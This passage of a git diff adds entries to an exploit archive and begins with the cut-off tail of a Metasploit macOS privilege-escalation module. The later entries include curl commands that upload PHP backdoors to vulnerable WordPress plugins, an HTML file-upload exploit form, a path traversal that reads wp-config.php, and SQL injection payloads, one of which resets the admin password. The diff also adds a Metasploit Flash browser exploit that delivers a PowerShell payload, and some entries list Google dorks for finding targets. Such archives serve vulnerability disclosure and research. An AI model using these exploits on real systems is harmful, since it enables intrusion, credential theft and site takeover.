'CVE-2015-1130', 'exploit.py' + )) + end + + def binary_payload + Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) + end + + def exploit_file + @exploit_file ||= + "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" + end + + def payload_file + @payload_file ||= + "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}" + end + +end \ No newline at end of file diff --git a/platforms/php/webapps/36611.txt b/platforms/php/webapps/36611.txt new file mode 100755 index 000000000..fb519b07e --- /dev/null +++ b/platforms/php/webapps/36611.txt @@ -0,0 +1,56 @@ +# Exploit Title: Wordpress SimpleCart Theme File Upload and Execution +# Google Dork: inurl:/wp-content/themes/simplecart +# Date: 31 March 2015 +# Exploit Author: Divya +# Vendor Homepage: https://github.com/UpThemes/ +# Software Link: https://github.com/UpThemes/SimpleCart-Theme +# Version: 2.1.2 +# Tested on: Windows, Linux +# CVE : None +# +# Other Themes: +# Micro Theme 1.0.3: https://github.com/UpThemes/Micro-Theme +# Holding Pattern Theme 1.3: https://github.com/UpThemes/Holding-Pattern-Theme +# Gallery Pro Theme 2.5.3: https://github.com/UpThemes/Gallery-Pro-Theme/ +# Evo Theme 1.3: https://github.com/UpThemes/Evo-Theme +# Charity Theme 1.1.3: https://github.com/UpThemes/Charity-Theme/ + + + +WP Theme Exploit + + + + + +
+ Target IP: + HTTP  + HTTPS 
+ Upload File:
+ Upload Path:

+
+ Base64 Encoded value (without double quotes) + 1. "Li4vLi4vLi4vLi4v" for website root directory upload.
+ 2. "Lg==" for current directory upload.
+

+ Vulnerable File:

+ +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/36640.txt b/platforms/php/webapps/36640.txt new file mode 100755 index 000000000..89e628a4c --- /dev/null +++ b/platforms/php/webapps/36640.txt @@ -0,0 +1,64 @@ +###################### + +# Exploit Title : Wordpress Work the flow file upload 2.5.2 Shell Upload Vulnerability + +# Exploit Author : Claudio Viviani + + +# Software Link : https://downloads.wordpress.org/plugin/work-the-flow-file-upload.2.5.2.zip + +# Date : 2015-03-14 + +# Tested on : Linux BackBox 4.0 / curl 7.35.0 + +###################### + +# Description: + +Work the Flow File Upload. Embed Html5 User File Uploads and Workflows into pages and posts. +Multiple file Drag and Drop upload, Image Gallery display, Reordering and Archiving. +This two in one plugin provides shortcodes to embed front end user file upload capability and / or step by step workflow. + +###################### + +# Location : + +http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php + + +###################### + +# PoC: + + curl -k -X POST -F "action=upload" -F "files=@./backdoor.php" http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php + +# Backdoor Location: + + http://VICTIM/wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/files/backdoor.php + + +###################### + +# Vulnerability Disclosure Timeline: + +2015-03-14: Discovered vulnerability +2015-04-03: Vendor Notification +2015-04-03: Vendor Response/Feedback +2015-04-04: Vendor Fix/Patch (2.5.3) +2014-04-04: Public Disclosure + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + http://ffhd.homelab.it (Free Fuzzy Hashes Database) + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### diff --git a/platforms/php/webapps/36641.txt b/platforms/php/webapps/36641.txt new file mode 100755 index 000000000..6e7196724 --- /dev/null +++ b/platforms/php/webapps/36641.txt @@ -0,0 +1,47 @@ +# Exploit Title: *u-Auctions Multiple Vulnerabilities* +# Google Dork: "*Powered by u-Auctions** ©*" +# Date: *03 April 2015* +# Exploit Author: *Don* +# Vendor Homepage: https://www.*u-auctions.com */ +# Version: *ALL* +# Tested on: *Debian* + +*1. Blind SQL injection*: + +This vulnerability affects */adsearch.php* +URL encoded POST input *category* was set to +*(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/* + +*POC:* + +*http://www .targetsite.com +/adsearch.php=action=search&buyitnow=y&buyitnowonly=y&category=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&closed=y&country=Afghanistan&csrftoken=59b61458fbbb4d6d44a4880717a3350a&desc=y&ending=1&go=GO%20%3E%3E&maxprice=1&minprice=1&payment%5b%5d=paypal&seller=1&SortProperty=ends&title=Mr.&type=2&zipcode=94102* + +*Done* +*+-------------------------------------------------------------------------------------------------------------------------------------+* +*2. HTTP parameter pollution* +This vulnerability affects /*feedback.php* + +URL encoded GET input *id* was set to *1&n903553=v972172* +Parameter precedence: *last occurrence* +Affected parameter: *user_id=1* + +The impact depends on the affected web application. +*An attacker could*: +*1* = Override existing hardcoded HTTP parameters +*2* = Modify the application behaviors +*3* = Access and, potentially exploit, uncontrollable variables +*4* = Bypass input validation checkpoints and WAFs rules + +POC: + +*http://www .targetsite.com +/feedback.php?faction=show&id=1%26n903553%3dv972172* +*Done* +*+-------------------------------------------------------------------------------------------------------------------------------------+* +*There is XSS too but I don't see it useful for anything, so will skip it.* +*Cheers folks, Don (Balcan Crew) is back! :)* +*Have fun and have friends!* +*Shouts to my good friends from past / whoever is online / this website and +new kids from the localhost.* +*~Don 2015* diff --git a/platforms/php/webapps/36691.txt b/platforms/php/webapps/36691.txt new file mode 100755 index 000000000..ae30d22e8 --- /dev/null +++ b/platforms/php/webapps/36691.txt @@ -0,0 +1,48 @@ +################################################################################################## +#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerbility +#Author : Manish Kishan Tanwar AKA error1046 +#Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ +#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip +#Date : 9/04/2015 +#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi +#Discovered At : Indishell Lab +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + +file uploading code(uploader.php) in Windows Desktop and iPhone Photo Uploader plugin doesnt check for file extension before uploading it to server +and hence vulnerable to arbitrary file upload + +//////////////// +/// POC //// +/////////////// + + +Uploading PHP shell +================================= +Just open uploader.php in plugin directory +http://target.com/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php +browse your php shell and submit it. +after uploading, you will get your shell in uploads directory at following location + +http://target.com/wp-content/uploads/i-dump-uploads/ + +demo:- +http://127.0.0.1/wordpress/wp-content/plugins/i-dump-iphone-to-wordpress-photo-uploader/uploader.php +and upload your shell + + + --==[[ Greetz To ]]==-- +############################################################################################ +#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, +#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, +#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, +#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash +############################################################################################# + --==[[Love to]]==-- +# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, +#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) + --==[[ Special Fuck goes to ]]==-- + <3 suriya Cyber Tyson <3 \ No newline at end of file diff --git a/platforms/php/webapps/36733.txt b/platforms/php/webapps/36733.txt new file mode 100755 index 000000000..00536647c --- /dev/null +++ b/platforms/php/webapps/36733.txt @@ -0,0 +1,18 @@ +# Exploit Title: Wordpress Plugin 'WP Mobile Edition' Remote File Disclosure Vulnerability +# Date: April 11, 2015 +# Exploit Author: @LookHin (Khwanchai Kaewyos) +# Google Dork: inurl:?fdx_switcher=mobile +# Vendor Homepage: https://wordpress.org/plugins/wp-mobile-edition/ +# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip +# Version: WP Mobile Edition Version 2.2.7 + +- Overview: +Wordpress Plugin 'WP Mobile Edition' is not filtering data in GET parameter 'files' in file 'themes/mTheme-Unus/css/css.php' + +- Search on Google +inurl:?fdx_switcher=mobile + +- POC +Exploit view source code wp-config.php +http://[server]/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php + diff --git a/platforms/php/webapps/36735.txt b/platforms/php/webapps/36735.txt new file mode 100755 index 000000000..016388461 --- /dev/null +++ b/platforms/php/webapps/36735.txt @@ -0,0 +1,90 @@ +?###################### + +# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/ + +# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip + +# Date : 2015-04-08 + +# Tested on : Linux / Mozilla Firefox + +###################### + +# Description + + Wordpress Duplicator 0.5.14 suffers from remote SQL Injection Vulnerability + + + Location file: /view/actions.php + + This is the bugged ajax functions wp_ajax_duplicator_package_delete: + + function duplicator_package_delete() { + + DUP_Util::CheckPermissions('export'); + + try { + global $wpdb; + $json = array(); + $post = stripslashes_deep($_POST); + $tblName = $wpdb->prefix . 'duplicator_packages'; + $postIDs = isset($post['duplicator_delid']) ? $post['duplicator_delid'] : null; + $list = explode(",", $postIDs); + $delCount = 0; + + if ($postIDs != null) { + + foreach ($list as $id) { + $getResult = $wpdb->get_results("SELECT name, hash FROM `{$tblName}` WHERE id = {$id}", ARRAY_A); + if ($getResult) { + $row = $getResult[0]; + $nameHash = "{$row['name']}_{$row['hash']}"; + $delResult = $wpdb->query("DELETE FROM `{$tblName}` WHERE id = {$id}"); + if ($delResult != 0) { + + + $post['duplicator_delid'] variable is not sanitized + + A authorized user with "export" permission or a remote unauthenticated attacker could + use this vulnerability to execute arbitrary SQL queries on the victim + WordPress web site by enticing an authenticated admin (CSRF) + + +###################### + +# PoC + + http://target/wp-admin/admin-ajax.php?action=duplicator_package_delete + + POST: duplicator_delid=1 and (select * from (select(sleep(20)))a) + + +###################### + +# Vulnerability Disclosure Timeline: + +2015-04-08: Discovered vulnerability +2015-04-08: Vendor Notification +2015-04-09: Vendor Response/Feedback +2015-04-10: Vendor Send Fix/Patch +2015-04-10: Public Disclosure + +####################### + +Discovered By : Claudio Viviani + http://www.homelab.it + http://ffhd.homelab.it (Free Fuzzy Hashes Database) + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### diff --git a/platforms/php/webapps/36736.txt b/platforms/php/webapps/36736.txt new file mode 100755 index 000000000..3d40cde91 --- /dev/null +++ b/platforms/php/webapps/36736.txt @@ -0,0 +1,55 @@ +# Exploit Title: Traidnt Up v3.0 SQL Injection +# Google Dork: "Powered by TRAIDNT UP Version 3.0" +# Date: 10-04-2015 +# Exploit Author: Ali Sami (ali.albakara@outlook.com) +# Vendor Homepage: http://traidnt.net +# Software Link: http://www.traidnt.net/vb/attachments/519880d1285278011-traidnt-up-v3.0.zip +# Version: 3.0 + +######### Vulnerable Code ############ +File: classUserdb.php + protected function doUpdateLastActive($username) + { + + $this->_db->query("UPDATE `users` SET `lastactive` = '" . NOWTIME . "' WHERE `name` = '$username' LIMIT 1 ;"); + $sql = "UPDATE `users` SET `lastip` = '" . $this->getIpAddr() . "' WHERE `name` = '$username' LIMIT 1 ;"; + echo $sql; + $this->_db->query($sql); + + } + + private function getIpAddr() + { + if (!empty($_SERVER['HTTP_CLIENT_IP'])) { + $ip = $_SERVER['HTTP_CLIENT_IP']; + } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { + $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; + } else { + $ip = $_SERVER['REMOTE_ADDR']; + } + return $ip; + } +###################################### + +########## Explanation ############### +getIpAddr function prioritizes untrusted user input entry (HTTP_CLIENT_IP & HTTP_X_FORWARDED_FOR) over the trusted one (REMOTE_ADDR) and does not sanitization +###################################### + +########## Proof-of-concept ########## +1. Register an account at the upload center +2. Send a request that consists of an extra header (CLIENT-IP) which must contain the intended SQL to cp.php +####################################### + +########## Request Example ########### +GET /up/cp.php HTTP/1.1 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8,ar;q=0.6 +Cookie: PREF=ID=3a12b65d918b5ae2:U=45f515bf65b09574:FF=4:LD=en:TM=1427718041:LM=1428079570:GM=1:S=fKvs0s67_JroY23b; SID=DQAAABYBAAAXBPxKBeMSz09m3xCH23suPwacDFc9z5ZTI1ryFZK7qYLbSIB4zQXOmaYpafjcxlh6qaAHy-rPNZOPYjnLa-pW4Xly4-XIfNze1b1HCtrbf5Nm5pBrxOdoyeKsjg0-CvszxYHXgkzN7JcJc-1ujf4fHrEZNoSR9k_f2Qm7WX3mXd-8z_guk36_sve2sHN2_d7eeT_e5IQl43NcT5ID_YMNPXQPADss_k0kOraKLeZn7kUs3wox8ZanbvgMSM9O8lQ5oaP7CmtioaFpts1Aunqk43teWMS35YAP6_d9i65Sx32NJoCqGQpMs2pQiMvbxm10DlBixFJuwW1AitFrblnTUg06mgzqTzPLoPVJ_KlHRbeBys_VyJxnmUx1IrwQJzk; HSID=AQJUEVtf4qu2U_FTd; SSID=AN_8N-KoCnT18Clw5; APISID=IqdO-J-4tT4AtOR8/AQp8y6Nd19D86imDx; SAPISID=MMGr9eZKdxn4QieS/Ak36TdFaTbAMrcFGl; S=videobuying=MntGlNA3nRzvbhbjINLRMw; NID=67=TabAC6lMzTQywxlSyMcuCfGN3PSOxY0X3VV0jglmXfVhTEGrkhWyrhTxLDOUytsOKlLuRHJhAatM2tSk5BiAweIssYjppGFH3zGLklwMBFqMwZqlxEQANw-qJwh2Jri6G7fL68NA2PyDT6dPNc9iY_zPfNtQ4jQEHq0Rqio7vRYs_1aPsPWp_mzoWs9lZPps_dmCRWv76C6WvGdw8ZruV86ojr77-qIkjnpVQKAhH5aRDCTGNKFRZ5LIRZXOhw +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36 +X-Client-Data: CJK2yQEIpbbJAQiptskB +Client-IP: 127.0.0.1', name='admin', password=md5('123') WHERE id = 1-- + +** This request will update the administrator's username to (admin) and password to (123) +###################################### + + diff --git a/platforms/php/webapps/36738.txt b/platforms/php/webapps/36738.txt new file mode 100755 index 000000000..00ea783c6 --- /dev/null +++ b/platforms/php/webapps/36738.txt @@ -0,0 +1,55 @@ +###################### + +# Exploit Title : Wordpress N-Media Website Contact Form with File Upload 1.3.4 Shell Upload Vulnerability + +# Exploit Author : Claudio Viviani + + +# Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload.1.3.4.zip + +# Date : 2015-04-1 + +# Dork Google: index of website-contact-form-with-file-upload + index of /uploads/contact_files/ + +# Tested on : Linux BackBox 4.0 / curl 7.35.0 + +##################### + +# Info : + + The "upload_file()" ajax function is affected from unrestircted file upload vulnerability. + + +###################### + +# PoC: + + curl -k -X POST -F "action=upload" -F "Filedata=@./backdoor.php" -F "action=nm_webcontact_upload_file" http://VICTIM/wp-admin/admin-ajax.php + + + Response: {"status":"uploaded","filename":"1427927588-backdoor.php"} + + +###################### + +# Backdoor Location: + + http://VICTIM/wp-content/uploads/contact_files/1427927588-backdoor.php + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + http://ffhd.homelab.it (Free Fuzzy Hashes Database) + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww + +##################### \ No newline at end of file diff --git a/platforms/windows/remote/36744.rb b/platforms/windows/remote/36744.rb new file mode 100755 index 000000000..92b420e05 --- /dev/null +++ b/platforms/windows/remote/36744.rb @@ -0,0 +1,105 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player casi32 Integer Overflow', + 'Description' => %q{ + This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in + the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as + domainMemory for the current application domain. This module has been tested successfully + on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bilou', # Vulnerability discovery + 'juan vazquez' # msf module + ], + 'References' => + [ + ['ZDI', '14-365'], + ['CVE', '2014-0569'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-22.html'], + ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0569.html'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^15\./ && ver == '15.0.0.167' }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Oct 14 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0569', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end \ No newline at end of file